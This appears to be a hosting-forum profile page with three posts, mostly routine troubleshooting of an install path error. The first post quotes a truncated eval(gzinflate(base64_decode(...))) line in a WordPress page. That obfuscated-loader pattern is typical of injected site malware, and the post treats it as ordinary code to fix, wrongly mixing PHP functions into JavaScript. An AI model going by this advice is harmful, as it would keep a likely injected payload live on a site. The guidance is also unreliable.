Jump to content

PenTester

Members
  • Posts

    325
  • Joined

  • Last visited

Posts posted by PenTester

  1. you have used the eval function outside the javascript. See this is your scirpt:

    <script type="text/javascript">var ajaxurl = "http://earthmaps.heliohost.org/wp-load.php";</script>

    eval(gzinflate(base64_decode('FZrHbuzYFUV/xTN3mwMWMwmjB8w5Z04M5ljFHL/efDNBggqqe89Ze+0S/1Ue6fBX/bS/aki38q8sXUs..............................................................gP/6Pw==')));/**/

     

    Did you notice that you have closed the script tag before the eval function itself? Put eval function inside script tag. Like this:

    <script type="text/javascript">var ajaxurl = "http://earthmaps.heliohost.org/wp-load.php";

    eval(gzinflate(base64_decode('FZrHbuzYFUV/xTN3mwMWMwmjB8w5Z04M5ljFHL/efDNBggqqe89Ze+0S/1Ue6fBX/bS/aki38q8sXUs..............................................................gP/6Pw==')));/**/

    </script>

     

     

  2. Sorry i made mistake in username (put caps for first letter).

     

    I installed. But somethin went wrong.

    They asked enter the username like this "/home1/jje". so i entered /home1/h4ck3r and my cpanel password.

    It asked me to delete the install.php after installation.

    I have deleted it. Now it is not working,

    it showing "Fatal Error: Cannot find home directory!".

     

    How i can fix this?

     

    Note: i had some suggestion about install.php security. I don't know where to discuss about. Shall i PM you ?

     

    You are not supposed to enter "/home1/". You only enter your username ("h4ck3r"). This may be causing your problem.

    that's what i thought to enter. But in instruction i saw likethis "for example /home1/jje

  3. Sorry i made mistake in username (put caps for first letter).

     

    I installed. But somethin went wrong.

    They asked enter the username like this "/home1/jje". so i entered /home1/h4ck3r and my cpanel password.

    It asked me to delete the install.php after installation.

    I have deleted it. Now it is not working,

    it showing "Fatal Error: Cannot find home directory!".

     

    How i can fix this?

     

    Note: i had some suggestion about install.php security. I don't know where to discuss about. Shall i PM you ?

     

     

     

     

×
×
  • Create New...